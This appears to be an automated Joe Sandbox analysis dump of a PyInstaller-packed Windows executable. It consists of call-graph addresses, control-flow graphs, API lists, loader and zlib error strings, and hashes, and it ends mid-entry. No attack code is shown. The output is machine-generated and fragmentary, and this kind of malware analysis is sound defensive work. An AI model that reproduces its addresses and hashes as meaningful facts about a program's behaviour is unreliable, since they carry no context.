20169->20170 20173 7ff72aa98700 20170->20173 20174 7ff72aa98741 20173->20174 20175 7ff72aa901e0 _fread_nolock MultiByteToWideChar 20174->20175 20179 7ff72aa9878b 20175->20179 20176 7ff72aa98a09 20177 7ff72aa7be00 _wfindfirst32i64 8 API calls 20176->20177 20178 7ff72aa92e26 20177->20178 20178->20166 20179->20176 20180 7ff72aa8e19c _fread_nolock 12 API calls 20179->20180 20181 7ff72aa988c1 20179->20181 20182 7ff72aa987c3 20179->20182 20180->20182 20181->20176 20183 7ff72aa8b4ec __free_lconv_num 11 API calls 20181->20183 20182->20181 20184 7ff72aa901e0 _fread_nolock MultiByteToWideChar 20182->20184 20183->20176 20185 7ff72aa98836 20184->20185 20185->20181 20204 7ff72aa8fb84 20185->20204 20188 7ff72aa988d2 20191 7ff72aa8e19c _fread_nolock 12 API calls 20188->20191 20192 7ff72aa989a4 20188->20192 20194 7ff72aa988f0 20188->20194 20189 7ff72aa98881 20189->20181 20190 7ff72aa8fb84 __crtLCMapStringW 6 API calls 20189->20190 20190->20181 20191->20194 20192->20181 20193 7ff72aa8b4ec __free_lconv_num 11 API calls 20192->20193 20193->20181 20194->20181 20195 7ff72aa8fb84 __crtLCMapStringW 6 API calls 20194->20195 20196 7ff72aa98970 20195->20196 20196->20192 20197 7ff72aa98990 20196->20197 20198 7ff72aa989a6 20196->20198 20199 7ff72aa90aa8 WideCharToMultiByte 20197->20199 20200 7ff72aa90aa8 WideCharToMultiByte 20198->20200 20201 7ff72aa9899e 20199->20201 20200->20201 20201->20192 20202 7ff72aa989be 20201->20202 20202->20181 20203 7ff72aa8b4ec __free_lconv_num 11 API calls 20202->20203 20203->20181 20205 7ff72aa8f7b0 __crtLCMapStringW 5 API calls 20204->20205 20206 7ff72aa8fbc2 20205->20206 20209 7ff72aa8fbca 20206->20209 20210 7ff72aa8fc70 20206->20210 20208 7ff72aa8fc33 LCMapStringW 20208->20209 20209->20181 20209->20188 20209->20189 20211 7ff72aa8f7b0 __crtLCMapStringW 5 API calls 20210->20211 20212 7ff72aa8fc9e __crtLCMapStringW 20211->20212 20212->20208 20215 7ff72aa97210 20214->20215 20216 7ff72aa971f9 20214->20216 20215->20216 20219 7ff72aa9721e 20215->20219 20217 7ff72aa85aa4 memcpy_s 11 API calls 20216->20217 20218 7ff72aa971fe 20217->20218 20220 7ff72aa8b484 _invalid_parameter_noinfo 37 API calls 20218->20220 20221 7ff72aa85578 45 API calls 20219->20221 20222 7ff72aa97209 20219->20222 20220->20222 20221->20222 20222->19900 20224 7ff72aa85578 45 API calls 20223->20224 20225 7ff72aa99e29 20224->20225 20228 7ff72aa99a80 20225->20228 20232 7ff72aa99ace 20228->20232 20229 7ff72aa7be00 _wfindfirst32i64 8 API calls 20230 7ff72aa980b5 20229->20230 20230->19900 20230->19923 20231 7ff72aa99b55 20233 7ff72aa901e0 _fread_nolock MultiByteToWideChar 20231->20233 20237 7ff72aa99b59 20231->20237 20232->20231 20234 7ff72aa99b40 GetCPInfo 20232->20234 20232->20237 20235 7ff72aa99bed 20233->20235 20234->20231 20234->20237 20236 7ff72aa8e19c _fread_nolock 12 API calls 20235->20236 20235->20237 20238 7ff72aa99c24 20235->20238 20236->20238 20237->20229 20238->20237 20239 7ff72aa901e0 _fread_nolock MultiByteToWideChar 20238->20239 20240 7ff72aa99c92 20239->20240 20241 7ff72aa99d74 20240->20241 20242 7ff72aa901e0 _fread_nolock MultiByteToWideChar 20240->20242 20241->20237 20243 7ff72aa8b4ec __free_lconv_num 11 API calls 20241->20243 20244 7ff72aa99cb8 20242->20244 20243->20237 20244->20241 20245 7ff72aa8e19c _fread_nolock 12 API calls 20244->20245 20246 7ff72aa99ce5 20244->20246 20245->20246 20246->20241 20247 7ff72aa901e0 _fread_nolock MultiByteToWideChar 20246->20247 20248 7ff72aa99d5c 20247->20248 20249 7ff72aa99d62 20248->20249 20250 7ff72aa99d7c 20248->20250 20249->20241 20252 7ff72aa8b4ec __free_lconv_num 11 API calls 20249->20252 20257 7ff72aa8fa08 20250->20257 20252->20241 20254 7ff72aa99dbb 20254->20237 20256 7ff72aa8b4ec __free_lconv_num 11 API calls 20254->20256 20255 7ff72aa8b4ec __free_lconv_num 11 API calls 20255->20254 20256->20237 20258 7ff72aa8f7b0 __crtLCMapStringW 5 API calls 20257->20258 20259 7ff72aa8fa46 20258->20259 20260 7ff72aa8fa4e 20259->20260 20261 7ff72aa8fc70 __crtLCMapStringW 5 API calls 20259->20261 20260->20254 20260->20255 20262 7ff72aa8fab7 CompareStringW 20261->20262 20262->20260 20264 7ff72aa98af1 20263->20264 20265 7ff72aa98b0a HeapSize 20263->20265 20266 7ff72aa85aa4 memcpy_s 11 API calls 20264->20266 20267 7ff72aa98af6 20266->20267 20268 7ff72aa8b484 _invalid_parameter_noinfo 37 API calls 20267->20268 20269 7ff72aa98b01 20268->20269 20269->19930 20271 7ff72aa914b1 20270->20271 20272 7ff72aa914bb 20270->20272 20274 7ff72aa8e19c _fread_nolock 12 API calls 20271->20274 20273 7ff72aa914c0 20272->20273 20281 7ff72aa914c7 memcpy_s 20272->20281 20276 7ff72aa8b4ec __free_lconv_num 11 API calls 20273->20276 20275 7ff72aa914b9 20274->20275 20275->19932 20276->20275 20277 7ff72aa914fa HeapReAlloc 20277->20275 20277->20281 20278 7ff72aa914cd 20279 7ff72aa85aa4 memcpy_s 11 API calls 20278->20279 20279->20275 20280 7ff72aa941e0 memcpy_s 2 API calls 20280->20281 20281->20277 20281->20278 20281->20280 20283 7ff72aa89d95 20282->20283 20294 7ff72aa89d91 20282->20294 20303 7ff72aa9368c GetEnvironmentStringsW 20283->20303 20286 7ff72aa89da2 20289 7ff72aa8b4ec __free_lconv_num 11 API calls 20286->20289 20287 7ff72aa89dae 20310 7ff72aa89efc 20287->20310 20289->20294 20291 7ff72aa8b4ec __free_lconv_num 11 API calls 20292 7ff72aa89dd5 20291->20292 20293 7ff72aa8b4ec __free_lconv_num 11 API calls 20292->20293 20293->20294 20294->19968 20295 7ff72aa8a13c 20294->20295 20296 7ff72aa8a15f 20295->20296 20301 7ff72aa8a176 20295->20301 20296->19968 20297 7ff72aa901e0 MultiByteToWideChar _fread_nolock 20297->20301 20298 7ff72aa8f738 memcpy_s 11 API calls 20298->20301 20299 7ff72aa8a1ea 20300 7ff72aa8b4ec __free_lconv_num 11 API calls 20299->20300 20300->20296 20301->20296 20301->20297 20301->20298 20301->20299 20302 7ff72aa8b4ec __free_lconv_num 11 API calls 20301->20302 20302->20301 20304 7ff72aa89d9a 20303->20304 20306 7ff72aa936b0 20303->20306 20304->20286 20304->20287 20305 7ff72aa8e19c _fread_nolock 12 API calls 20307 7ff72aa936e7 memcpy_s 20305->20307 20306->20305 20308 7ff72aa8b4ec __free_lconv_num 11 API calls 20307->20308 20309 7ff72aa93707 FreeEnvironmentStringsW 20308->20309 20309->20304 20311 7ff72aa89f24 20310->20311 20312 7ff72aa8f738 memcpy_s 11 API calls 20311->20312 20313 7ff72aa89f5f 20312->20313 20316 7ff72aa89fe1 20313->20316 20318 7ff72aa8f738 memcpy_s 11 API calls 20313->20318 20319 7ff72aa89fd0 20313->20319 20320 7ff72aa91434 _wfindfirst32i64 37 API calls 20313->20320 20323 7ff72aa8a004 20313->20323 20326 7ff72aa8b4ec __free_lconv_num 11 API calls 20313->20326 20327 7ff72aa89f67 20313->20327 20314 7ff72aa8b4ec __free_lconv_num 11 API calls 20315 7ff72aa89db6 20314->20315 20315->20291 20317 7ff72aa8b4ec __free_lconv_num 11 API calls 20316->20317 20317->20315 20318->20313 20321 7ff72aa8a018 11 API calls 20319->20321 20320->20313 20322 7ff72aa89fd8 20321->20322 20324 7ff72aa8b4ec __free_lconv_num 11 API calls 20322->20324 20325 7ff72aa8b4a4 _wfindfirst32i64 17 API calls 20323->20325 20324->20327 20328 7ff72aa8a016 20325->20328 20326->20313 20327->20314 20331 7ff72aa999e9 __crtLCMapStringW 20329->20331 20330 7ff72aa97f9e 20330->19995 20330->19996 20331->20330 20332 7ff72aa8fa08 6 API calls 20331->20332 20332->20330 20333 7ff72aa79b8b 20334 7ff72aa79b91 20333->20334 20335 7ff72aa7b640 12 API calls 20334->20335 20336 7ff72aa7a446 20334->20336 20335->20336 19618 7ff72aa9bc14 19621 7ff72aa85958 LeaveCriticalSection 19618->19621 19310 7ff72aa7b390 19311 7ff72aa7b3be 19310->19311 19312 7ff72aa7b3a5 19310->19312 19312->19311 19314 7ff72aa8e19c 12 API calls 19312->19314 19313 7ff72aa7b41c 19314->19313 20839 7ff72aa9ba8e 20841 7ff72aa9ba9e 20839->20841 20843 7ff72aa85958 LeaveCriticalSection 20841->20843 20710 7ff72aa92300 20721 7ff72aa98294 20710->20721 20722 7ff72aa982a1 20721->20722 20723 7ff72aa8b4ec __free_lconv_num 11 API calls 20722->20723 20724 7ff72aa982bd 20722->20724 20723->20722 20725 7ff72aa8b4ec __free_lconv_num 11 API calls 20724->20725 20726 7ff72aa92309 20724->20726 20725->20724 20727 7ff72aa91298 EnterCriticalSection 20726->20727 20378 7ff72aa8bb70 20379 7ff72aa8bb8a 20378->20379 20380 7ff72aa8bb75 20378->20380 20384 7ff72aa8bb90 20380->20384 20385 7ff72aa8bbd2 20384->20385 20388 7ff72aa8bbda 20384->20388 20387 7ff72aa8b4ec __free_lconv_num 11 API calls 20385->20387 20386 7ff72aa8b4ec __free_lconv_num 11 API calls 20389 7ff72aa8bbe7 20386->20389 20387->20388 20388->20386 20390 7ff72aa8b4ec __free_lconv_num 11 API calls 20389->20390 20391 7ff72aa8bbf4 20390->20391 20392 7ff72aa8b4ec __free_lconv_num 11 API calls 20391->20392 20393 7ff72aa8bc01 20392->20393 20394 7ff72aa8b4ec __free_lconv_num 11 API calls 20393->20394 20395 7ff72aa8bc0e 20394->20395 20396 7ff72aa8b4ec __free_lconv_num 11 API calls 20395->20396 20397 7ff72aa8bc1b 20396->20397 20398 7ff72aa8b4ec __free_lconv_num 11 API calls 20397->20398 20399 7ff72aa8bc28 20398->20399 20400 7ff72aa8b4ec __free_lconv_num 11 API calls 20399->20400 20401 7ff72aa8bc35 20400->20401 20402 7ff72aa8b4ec __free_lconv_num 11 API calls 20401->20402 20403 7ff72aa8bc45 20402->20403 20404 7ff72aa8b4ec __free_lconv_num 11 API calls 20403->20404 20405 7ff72aa8bc55 20404->20405 20410 7ff72aa8ba38 20405->20410 20424 7ff72aa91298 EnterCriticalSection 20410->20424 20738 7ff72aa858f0 20739 7ff72aa858fb 20738->20739 20747 7ff72aa8fd44 20739->20747 20760 7ff72aa91298 EnterCriticalSection 20747->20760 20447 7ff72aa7a55d 20450 7ff72aa7a562 20447->20450 20448 7ff72aa7b640 12 API calls 20452 7ff72aa7a446 20448->20452 20454 7ff72aa7a6ca 20450->20454 20456 7ff72aa7a233 20450->20456 20457 7ff72aa7b750 20450->20457 20451 7ff72aa7b750 12 API calls 20453 7ff72aa7a9d8 20451->20453 20455 7ff72aa7b750 12 API calls 20453->20455 20454->20451 20454->20456 20455->20456 20456->20448 20456->20452 20458 7ff72aa7b7b0 20457->20458 20459 7ff72aa7bcea 20458->20459 20464 7ff72aa7b7cf 20458->20464 20460 7ff72aa7bf34 8 API calls 20459->20460 20461 7ff72aa7bcef 20460->20461 20462 7ff72aa7be00 _wfindfirst32i64 8 API calls 20463 7ff72aa7bccc 20462->20463 20463->20454 20464->20462

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 111 7ff72aa96950-7ff72aa9698b call 7ff72aa962d8 call 7ff72aa962e0 call 7ff72aa96348 118 7ff72aa96991-7ff72aa9699c call 7ff72aa962e8 111->118 119 7ff72aa96bb5-7ff72aa96c01 call 7ff72aa8b4a4 call 7ff72aa962d8 call 7ff72aa962e0 call 7ff72aa96348 111->119 118->119 124 7ff72aa969a2-7ff72aa969ac 118->124 146 7ff72aa96d3f-7ff72aa96dad call 7ff72aa8b4a4 call 7ff72aa921c8 119->146 147 7ff72aa96c07-7ff72aa96c12 call 7ff72aa962e8 119->147 126 7ff72aa969ce-7ff72aa969d2 124->126 127 7ff72aa969ae-7ff72aa969b1 124->127 130 7ff72aa969d5-7ff72aa969dd 126->130 129 7ff72aa969b4-7ff72aa969bf 127->129 132 7ff72aa969c1-7ff72aa969c8 129->132 133 7ff72aa969ca-7ff72aa969cc 129->133 130->130 134 7ff72aa969df-7ff72aa969f2 call 7ff72aa8e19c 130->134 132->129 132->133 133->126 136 7ff72aa969fb-7ff72aa96a09 133->136 141 7ff72aa969f4-7ff72aa969f6 call 7ff72aa8b4ec 134->141 142 7ff72aa96a0a-7ff72aa96a16 call 7ff72aa8b4ec 134->142 141->136 151 7ff72aa96a1d-7ff72aa96a25 142->151 165 7ff72aa96daf-7ff72aa96db6 146->165 166 7ff72aa96dbb-7ff72aa96dbe 146->166 147->146 155 7ff72aa96c18-7ff72aa96c23 call 7ff72aa96318 147->155 151->151 154 7ff72aa96a27-7ff72aa96a38 call 7ff72aa91434 151->154 154->119 163 7ff72aa96a3e-7ff72aa96a94 call 7ff72aa9b380 * 4 call 7ff72aa9686c 154->163 155->146 164 7ff72aa96c29-7ff72aa96c4c call 7ff72aa8b4ec GetTimeZoneInformation 155->164 223 7ff72aa96a96-7ff72aa96a9a 163->223 180 7ff72aa96c52-7ff72aa96c73 164->180 181 7ff72aa96d14-7ff72aa96d3e call 7ff72aa962d0 call 7ff72aa962c0 call 7ff72aa962c8 164->181 169 7ff72aa96e4b-7ff72aa96e4e 165->169 170 7ff72aa96dc0 166->170 171 7ff72aa96df5-7ff72aa96e08 call 7ff72aa8e19c 166->171 174 7ff72aa96dc3 169->174 175 7ff72aa96e54-7ff72aa96e5c call 7ff72aa96950 169->175 170->174 185 7ff72aa96e13-7ff72aa96e2e call 7ff72aa921c8 171->185 186 7ff72aa96e0a 171->186 182 7ff72aa96dc8-7ff72aa96df4 call 7ff72aa8b4ec call 7ff72aa7be00 174->182 183 7ff72aa96dc3 call 7ff72aa96bcc 174->183 175->182 188 7ff72aa96c75-7ff72aa96c7b 180->188 189 7ff72aa96c7e-7ff72aa96c85 180->189 183->182 207 7ff72aa96e30-7ff72aa96e33 185->207 208 7ff72aa96e35-7ff72aa96e47 call 7ff72aa8b4ec 185->208 192 7ff72aa96e0c-7ff72aa96e11 call 7ff72aa8b4ec 186->192 188->189 195 7ff72aa96c87-7ff72aa96c8f 189->195 196 7ff72aa96c99 189->196 192->170 195->196 202 7ff72aa96c91-7ff72aa96c97 195->202 203 7ff72aa96c9b-7ff72aa96d0f call 7ff72aa9b380 * 4 call 7ff72aa937ac call 7ff72aa96e64 * 2 196->203 202->203 203->181 207->192 208->169 225 7ff72aa96aa0-7ff72aa96aa4 223->225 226 7ff72aa96a9c 223->226 225->223 228 7ff72aa96aa6-7ff72aa96acb call 7ff72aa8764c 225->228 226->225 234 7ff72aa96ace-7ff72aa96ad2 228->234 236 7ff72aa96ae1-7ff72aa96ae5 234->236 237 7ff72aa96ad4-7ff72aa96adf 234->237 236->234 237->236 239 7ff72aa96ae7-7ff72aa96aeb 237->239 241 7ff72aa96b6c-7ff72aa96b70 239->241 242 7ff72aa96aed-7ff72aa96b15 call 7ff72aa8764c 239->242 244 7ff72aa96b72-7ff72aa96b74 241->244 245 7ff72aa96b77-7ff72aa96b84 241->245 251 7ff72aa96b33-7ff72aa96b37 242->251 252 7ff72aa96b17 242->252 244->245 247 7ff72aa96b9f-7ff72aa96bae call 7ff72aa962d0 call 7ff72aa962c0 245->247 248 7ff72aa96b86-7ff72aa96b9c call 7ff72aa9686c 245->248 247->119 248->247 251->241 254 7ff72aa96b39-7ff72aa96b57 call 7ff72aa8764c 251->254 256 7ff72aa96b1a-7ff72aa96b21 252->256 263 7ff72aa96b63-7ff72aa96b6a 254->263 256->251 260 7ff72aa96b23-7ff72aa96b31 256->260 260->251 260->256 263->241 264 7ff72aa96b59-7ff72aa96b5d 263->264 264->241 265 7ff72aa96b5f 264->265 265->263
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF72AA96995
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF72AA962E8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72AA962FC
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF72AA8B4EC: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF72AA93972,?,?,?,00007FF72AA939AF,?,?,00000000,00007FF72AA93E75,?,?,00000000,00007FF72AA93DA7), ref: 00007FF72AA8B502
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF72AA8B4EC: GetLastError.KERNEL32(?,?,?,00007FF72AA93972,?,?,?,00007FF72AA939AF,?,?,00000000,00007FF72AA93E75,?,?,00000000,00007FF72AA93DA7), ref: 00007FF72AA8B50C
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF72AA8B4A4: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF72AA8B483,?,?,?,?,?,00007FF72AA836AC), ref: 00007FF72AA8B4AD
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF72AA8B4A4: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF72AA8B483,?,?,?,?,?,00007FF72AA836AC), ref: 00007FF72AA8B4D2
                                                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF72AA96984
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF72AA96348: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72AA9635C
                                                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF72AA96BFA
                                                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF72AA96C0B
                                                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF72AA96C1C
                                                                                                                                                                                                                                                            • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF72AA96E5C), ref: 00007FF72AA96C43
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureInformationLanguagesLastPreferredPresentProcessProcessorRestoreThreadTimeZone
                                                                                                                                                                                                                                                            • String ID: W. Europe Standard Time$W. Europe Summer Time
                                                                                                                                                                                                                                                            • API String ID: 1458651798-690618308
                                                                                                                                                                                                                                                            • Opcode ID: 6ec15ad00ebc81b5713ed5170bbebc68efdd6324f1cef62f169a4dbf8db42b45
                                                                                                                                                                                                                                                            • Instruction ID: af9c25cc5e7eb605be892e69ba1ff3e5c67882d2581df82afc75c1d901d6dbc4
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6ec15ad00ebc81b5713ed5170bbebc68efdd6324f1cef62f169a4dbf8db42b45
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A7D1B126A0829386F720BF29DC41DB9E771EF54B94FC08176EA0D47A85DF3CE5428B60
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 444 7ff72aa9789c-7ff72aa9790f call 7ff72aa975d0 447 7ff72aa97911-7ff72aa9791a call 7ff72aa85a84 444->447 448 7ff72aa97929-7ff72aa97933 call 7ff72aa88a14 444->448 455 7ff72aa9791d-7ff72aa97924 call 7ff72aa85aa4 447->455 453 7ff72aa97935-7ff72aa9794c call 7ff72aa85a84 call 7ff72aa85aa4 448->453 454 7ff72aa9794e-7ff72aa979b7 CreateFileW 448->454 453->455 457 7ff72aa97a34-7ff72aa97a3f GetFileType 454->457 458 7ff72aa979b9-7ff72aa979bf 454->458 466 7ff72aa97c6a-7ff72aa97c8a 455->466 461 7ff72aa97a41-7ff72aa97a7c GetLastError call 7ff72aa85a18 CloseHandle 457->461 462 7ff72aa97a92-7ff72aa97a99 457->462 464 7ff72aa97a01-7ff72aa97a2f GetLastError call 7ff72aa85a18 458->464 465 7ff72aa979c1-7ff72aa979c5 458->465 461->455 478 7ff72aa97a82-7ff72aa97a8d call 7ff72aa85aa4 461->478 469 7ff72aa97aa1-7ff72aa97aa4 462->469 470 7ff72aa97a9b-7ff72aa97a9f 462->470 464->455 465->464 471 7ff72aa979c7-7ff72aa979ff CreateFileW 465->471 475 7ff72aa97aaa-7ff72aa97aff call 7ff72aa8892c 469->475 476 7ff72aa97aa6 469->476 470->475 471->457 471->464 483 7ff72aa97b01-7ff72aa97b0d call 7ff72aa977d8 475->483 484 7ff72aa97b1e-7ff72aa97b4f call 7ff72aa97350 475->484 476->475 478->455 483->484 489 7ff72aa97b0f 483->489 490 7ff72aa97b51-7ff72aa97b53 484->490 491 7ff72aa97b55-7ff72aa97b97 484->491 492 7ff72aa97b11-7ff72aa97b19 call 7ff72aa8b664 489->492 490->492 493 7ff72aa97bb9-7ff72aa97bc4 491->493 494 7ff72aa97b99-7ff72aa97b9d 491->494 492->466 497 7ff72aa97c68 493->497 498 7ff72aa97bca-7ff72aa97bce 493->498 494->493 496 7ff72aa97b9f-7ff72aa97bb4 494->496 496->493 497->466 498->497 500 7ff72aa97bd4-7ff72aa97c19 CloseHandle CreateFileW 498->500 501 7ff72aa97c1b-7ff72aa97c49 GetLastError call 7ff72aa85a18 call 7ff72aa88b54 500->501 502 7ff72aa97c4e-7ff72aa97c63 500->502 501->502 502->497
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1617910340-0
                                                                                                                                                                                                                                                            • Opcode ID: ed7bb29f19db96d6df9cef71716606d4f492670f90b16f42eaf9bff86babf69b
                                                                                                                                                                                                                                                            • Instruction ID: 560a343dd5db3835ca17ae15c229b0a9a269251a3e5fc5fd7e91804787d471f1
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ed7bb29f19db96d6df9cef71716606d4f492670f90b16f42eaf9bff86babf69b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C8C1B036B24A4289FB50EF64C880AAC7771FB49B98F810665DE1E57794CF38D156CB20
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetTempPathW.KERNEL32(00000000,?,00000000,00000000,?,00007FF72AA7153F), ref: 00007FF72AA779E7
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF72AA77B60: GetEnvironmentVariableW.KERNEL32(00007FF72AA739FF), ref: 00007FF72AA77B9A
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF72AA77B60: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF72AA77BB7
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF72AA883CC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72AA883E5
                                                                                                                                                                                                                                                            • SetEnvironmentVariableW.KERNEL32 ref: 00007FF72AA77AA1
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF72AA72B10: MessageBoxW.USER32 ref: 00007FF72AA72BE5
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Environment$Variable$ExpandMessagePathStringsTemp_invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                                            • API String ID: 3752271684-1116378104
                                                                                                                                                                                                                                                            • Opcode ID: dfc166a7c24a1272c32cc273787991c4dfa4833da8b9fc90ebc635bfae17cc3b
                                                                                                                                                                                                                                                            • Instruction ID: fd2a81816b7eeb1cc7c6acf867ff2a85ed1669df68375c01ed9ceac838941290
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dfc166a7c24a1272c32cc273787991c4dfa4833da8b9fc90ebc635bfae17cc3b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 02516C11B0961385FB59B626AC25ABED272DF88BC0FC440B5ED0E4B797ED2DE5034E60
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                                                                                                                                                                                                                            • API String ID: 0-2665694366
                                                                                                                                                                                                                                                            • Opcode ID: 212d86a86c8cb6d9fc903fcdabd382662a83ce4cb1445b9d6573bc2018cf14a4
                                                                                                                                                                                                                                                            • Instruction ID: f72e5645d886257fa65a7bb173b0ee442cbc77d30f883e1cd3ae1f5090dc9264
